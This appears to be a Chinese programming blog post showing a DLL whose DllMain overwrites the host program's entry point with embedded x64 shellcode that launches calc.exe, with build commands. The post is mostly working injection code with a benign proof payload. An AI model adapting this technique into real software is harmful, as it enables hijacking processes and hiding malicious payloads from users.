dllmain中shellcode覆盖exe入口

最新推荐文章于 2025-06-02 01:05:10 发布
最新推荐文章于 2025-06-02 01:05:10 发布
阅读量231 收藏
点赞数 4
文章标签: c语言 windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54005873/article/details/145945836
版权

a.c   -> a.exe

#include<stdio.h>
#include<windows.h>

int gg();

int main(){
    gg();
    
    puts("over");
}

g.c  ->  g.dll

#include<windows.h>
#include<stdio.h>

//x64 弹计算器
BYTE code[]={72, 129, 236, 0, 1, 0, 0, 101, 72, 139, 4, 37, 96, 0, 0, 0, 72, 139, 64, 24, 72, 139, 64, 48, 72, 139, 112, 16, 72, 139, 88, 64, 72, 139, 
0, 129, 123, 12, 51, 0, 50, 0, 117, 236, 72, 139, 206, 72, 199, 194, 50, 116, 145, 12, 232, 192, 0, 0, 0, 76, 139, 240, 72, 199, 195, 108, 
108, 0, 0, 83, 72, 187, 117, 115, 101, 114, 51, 50, 46, 100, 83, 72, 139, 204, 72, 131, 236, 24, 65, 255, 214, 72, 139, 216, 72, 139, 203, 
72, 199, 194, 106, 10, 56, 30, 232, 142, 0, 0, 0, 76, 139, 240, 77, 51, 201, 77, 51, 192, 72, 51, 210, 72, 51, 201, 65, 255, 214, 72, 139, 
206, 72, 199, 194, 81, 47, 162, 1, 232, 109, 0, 0, 0, 76, 139, 240, 72, 51, 192, 80, 72, 184, 99, 97, 108, 99, 46, 101, 120, 101, 80, 72, 139, 204, 72, 131, 236, 32, 72, 199, 194, 1, 0, 0, 0, 65, 255, 214, 72, 139, 206, 72, 186, 133, 223, 175, 187, 0, 0, 0, 0, 232, 56, 0, 0, 0, 76, 139, 240, 72, 199, 192, 97, 100, 0, 0, 80, 72, 184, 69, 120, 105, 116, 84, 104, 114, 101, 80, 72, 139, 206, 72, 139, 212, 72, 131, 236, 32, 65, 255, 214, 76, 139, 240, 72, 129, 196, 136, 1, 0, 0, 72, 131, 236, 24, 72, 51, 201, 65, 255, 214, 195, 72, 131, 236, 64, 86, 72, 139, 250, 72, 139, 217, 72, 139, 115, 60, 72, 139, 198, 72, 193, 224, 54, 72, 193, 232, 54, 72, 139, 180, 3, 136, 0, 0, 0, 72, 193, 230, 32, 72, 193, 238, 32, 72, 3, 243, 86, 139, 118, 32, 72, 3, 243, 72, 51, 201, 255, 201, 255, 193, 173, 72, 3, 195, 51, 210, 128, 56, 0, 116, 15, 193, 202, 7, 81, 15, 190, 8, 3, 209, 89, 72, 255, 192, 235, 236, 59, 215, 117, 224, 94, 139, 86, 36, 72, 3, 211, 15, 191, 12, 74, 139, 86, 28, 72, 3, 211, 139, 4, 138, 72, 3, 195, 94, 72, 131, 196, 64, 195};

DWORD GetEntryPoint() {
    HMODULE hModule = GetModuleHandle(NULL); // 获取当前进程的主模块句柄
    if (!hModule) {
        fprintf(stderr, "GetModuleHandle failed\n");
        return 0;
    }
 
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        fprintf(stderr, "Invalid DOS header\n");
        return 0;
    }
 
    PIMAGE_NT_HEADERS32 pNtHeaders = (PIMAGE_NT_HEADERS32)((BYTE*)hModule + pDosHeader->e_lfanew);
    if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
        fprintf(stderr, "Invalid NT headers\n");
        return 0;
    }
 
    // 获取入口点的RVA(相对虚拟地址)并转换为绝对地址
    DWORD entryPointRVA = pNtHeaders->OptionalHeader.AddressOfEntryPoint;
    DWORD entryPoint = (DWORD)((BYTE*)hModule + entryPointRVA);
 
    return entryPoint;
}
 

int gg(){
    puts("Hello");
}

void hook(void*addr){

    SIZE_T regionSize = sizeof(code); 
    DWORD oldProtect;
   VirtualProtect(addr,sizeof(code), PAGE_EXECUTE_READWRITE, &oldProtect);
 
    memcpy(addr,&code,regionSize);

 
    printf("Memory protection changed successfully.\n");
}

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,  // DLL实例的句柄
  DWORD     fdwReason, // 调用原因
  LPVOID    lpvReserved // 保留参数
){
    if(fdwReason==DLL_PROCESS_ATTACH){
        void*addr=GetEntryPoint();

        printf("%p  www\n",addr);
        hook(addr);
        printf("%p  qqq\n",addr);
        printf("%p  aaa\n",addr);
    }
}

编译运行

gcc g.c -shared  -o g.dll
gcc a.c  -L . -lg
a.exe

在学02
关注
[样本分析] 海莲花CS样本
qq_42814021的博客
01-26 869
文章目录样本信息样本行为详细分析DllMain挂起其他线程劫持宿主进程,覆盖.text节ShellCode1Resource365_100019D0ShellCode3创建傀儡进程注入ShellCode4ShellCode4Sleep调用内置DLL,回连C2_executeDllEntryPoint总结分析 样本信息 MD5:3c0533706f1f2f9ce1d46658bbc2aa16 样本类型:DLL32 分析工具:DIE、OD、IDA 样本行为 该样本是个loader类型的DLL,其运行后回挟持宿主
使用dll加载shellcode编程中的问题
信息安全
03-08 2686
文章目录前言运行不了的代码问题定位解决方法解决方案一解决方案二 前言 前两天有个朋友在群里问了一个问题,想要实现用dll加载shellcode,但是写好了代码遇见了问题,shellcode运行不了,于是就有了这篇博客 运行不了的代码 他把运行不了的代码发了出来 // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" HANDLE hThread = ...
远程执行shellcode
aod83029的博客
06-13 510
#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup...
屡禁不止:一个敢于将自己注入到杀毒软件中的斗士
weixin_34290390的博客
09-14 1043
本文讲的是屡禁不止:一个敢于将自己注入到杀毒软件中的斗士, PlugX恶意软件可以算是攻击界的老前辈了,自2012年被曝光以来,它就以各种形式被黑客利用,截至目前它还一直活跃在攻击的最前沿。关于其长盛不衰的攻击功能,已经有很多个机构对其进行了研究,比如: 1.由Circl机构发布的“TR-12-用于针对性攻击的PlugX恶意软件变体的分析”。 2.由...
免杀对抗—DLL劫持&白加黑&隐写分离&EDR&Syscall-hook
2301_76227305的博客
10-31 2419
对于白加黑呢免杀效果是比较强的,关键是DLL后门的免杀,分离或者混淆都可以实现。至于这个Syscall,我是不会编写,只能玩一下别人的项目,而且这玩意挺难的我说实话,更加偏向于二进制那边的了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
本地缓冲区溢出分析
优快云
08-30 8021
栈溢出是缓冲区溢出中最为常见的一种攻击手法,其原理是,程序在运行时栈地址是由操作系统来负责维护的,在我们调用函数时,程序会将当前函数的下一条指令的地址压入栈中,而函数执行完毕后,则会通过ret指令从栈地址中弹出压入的返回地址,并将返回地址重新装载到EIP指令指针寄存器中,从而继续运行,然而将这种控制程序执行流程的地址保存到栈中,必然会给栈溢出攻击带来可行性。
Windows Dll Injection、Process Injection、API Hook、DLL后门/恶意程序入侵技术
weixin_30594001的博客
02-02 729
catalogue 1. 引言2. 使用注册表注入DLL3. 使用Windows挂钩来注入DLL4. 使用远程线程来注入DLL5. 使用木马DLL来注入DLL6. 把DLL作为调试器来注入7. 使用createprocess来注入代码8. APC DLL注入9. API Hook拦截10. Detours - Inline Hook11. 以服务形式执行DLL中指定函数/或直接指定EXE作为启动...
HOOK技术
05-16 2151
本公众号分享的所有技术仅用于学习交流,请勿用于其他非法活动,如有错漏,欢迎留言交流指正 HOOK 什么是HOOK? 用自己写的函数替换目标的函数,以后系统调用目标函数的时候就会调用我们自己的函数,就可以在自己的函数去监控程序执行的逻辑,进行参数的检查,过滤等,进一步拦截、修改、放行。 HOOK发生的在什么地方 ?磁盘?内存? HOOK是发生在内存中,只在此次系统运行期间有效,一旦系统或者程序重启,就需要重新HOOK 有可能在磁盘中函数替换,不叫HOOK,而是叫感染 比如电脑中了病毒,入口点..
逆向基础-加壳
AppWhite_Star的博客
07-30 869
逆向基础-加壳
C语言零基础入门教程:第一章 C语言入门
彭世瑜的博客
06-01 169
《C语言入门基础》摘要:本文介绍了C语言的基础知识,包括计算机语言发展简史、C语言版本演变、首个C程序编写与编译方法。重点讲解了C语言开发环境配置、代码注释规范、标准输入输出库使用及printf函数的格式化输出技巧。涵盖了常用占位符类型、输出格式控制(宽度/对齐/小数位)等核心内容,为初学者提供了完整的C语言编程入门指南。(150字)
Spring Boot 启动流程深度解析:从源码到实践
三两肉的博客
05-28 1491
本文深入解析了Spring Boot的启动流程,从源码层面剖析了其核心机制。启动入口从@SpringBootApplication注解的main方法开始,通过SpringApplication.run()方法执行初始化,推断应用类型并加载初始器和监听器。run()方法的核心逻辑包括:准备环境、创建上下文、刷新上下文、发布启动事件等关键步骤。Spring Boot通过事件机制在不同启动阶段发布事件,允许开发者介入。文章通过详细代码示例展示了SpringApplication初始化、环境准备和上下文创建等核心流
java 递归地复制文件夹及其所有子文件夹和文件
Java&Develop的博客
05-28 640
java 递归地复制文件夹及其所有子文件夹和文件
C++进阶--C++11(04)
2402_87779153的博客
05-29 1039
lambda表达式(格式,如何写,细节,底层),function(作用,格式,怎么写),bind(作用,格式,怎么写)
进程同步机制-信号量机制-记录型信号量机制中的的wait和signal操作
全局可见
05-29 744
wait和signal是记录型信号量机制中用于实现进程同步与互斥的两个重要操作,
嵌入式(C语言篇)Day13
h2358129875的博客
05-31 1238
结构组成:由LinkedList结构体管理head(头指针)、tail(尾指针)、size(节点数),每个Node包含data(数据)和next(后继指针)。核心操作:涵盖创建、销毁、遍历、增删查等,操作时需注意头/尾节点特殊情况(如首个节点需同时更新head和tail面试题关键思路时间复杂度空间复杂度求中间结点快慢指针法(单次遍历)O(n)O(1)判断是否有环快慢指针法(相遇即有环)O(n)O(1)反转链表三指针迭代反转(prev、curr、succ)O(n)O(1)
C++ 类模板三参数深度解析:从链表迭代器看类型推导与实例化(为什么迭代器类模版使用三参数?实例化又会是怎样?)
最新发布
2501_90200491的博客
06-02 719
本文深入解析了C++双向链表迭代器设计中的三模板参数机制。通过拆解T(元素类型)、Ref(引用类型)和Ptr(指针类型)三个参数的协同作用,揭示了迭代器如何实现类型通用性和读写分离。文章从内存视角详细展示了模板实例化过程,对比了三参数与单参数设计的优劣,并通过完整实例演示了从定义到调用的全链路。这种设计模式体现了C++泛型编程的哲学,在保证类型安全和零开销的前提下,实现了一套代码支持多种数据类型的复用机制,为理解STL容器设计提供了重要参考。
[特殊字符] xbatis 一款好用 ORM 框架 1.8.8-M2 发布,节省 1/3 代码和时间的框架!!!
Ai东的博客
05-30 497
🔥 xbatis 一款好用 ORM 框架 1.8.8-M2 发布,节省 1/3 代码和时间的框架!!! https://xbatis.cn
JAVA单商户易联云小票打印替换模板
weixin_71169215的博客
05-30 983
《易联云打印方法实现》摘要:ylyPrint方法通过接收YlyPrintRequest对象实现订单自动打印功能。方法流程包括:1)初始化打印机配置并获取access_token;2)构建格式化打印内容,包含商家信息、订单详情、商品列表及金额统计;3)调用易联云API完成打印。该方法采用URL编码确保传输安全,通过标准化的内容排版提升打印可读性,实现了商业场景下的高效自动化打印服务。(150字)
深入了解DllMain:动态链接库的入口函数解析
DllMain函数是Windows动态链接库(DLL)中的一个特殊入口函数,它的主要作用是在DLL加载和卸载时执行初始化和清理任务。每当一个DLL被加载到进程地址空间中,或者从进程中卸载时,Windows会调用DllMain函数。因此,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值